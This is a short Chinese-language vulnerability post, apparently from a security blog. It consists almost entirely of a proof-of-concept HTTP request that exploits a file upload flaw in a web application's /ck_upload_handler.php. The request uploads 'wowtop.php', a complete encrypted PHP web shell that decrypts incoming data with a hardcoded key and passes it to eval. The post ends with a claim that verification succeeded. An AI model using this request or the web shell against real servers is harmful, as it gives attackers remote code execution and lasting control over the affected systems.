特征:小绿标
特征界面二:
POC:
POST /ck_upload_handler.php HTTP/1.1Host: <IP>Content-Length: 791Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: <IP>Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE7DSCkF65FIKmwixUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: <IP>Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
------WebKitFormBoundaryE7DSCkF65FIKmwixContent-Disposition: form-data; name="upload"; filename="wowtop.php"Content-Type: application/octet-stream
<?php@error_reporting(0);session_start(); $key="e45e329feb5d925b"; $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params);?>
------WebKitFormBoundaryE7DSCkF65FIKmwix--
验证成功:
- End -
还没有评论,来说两句吧...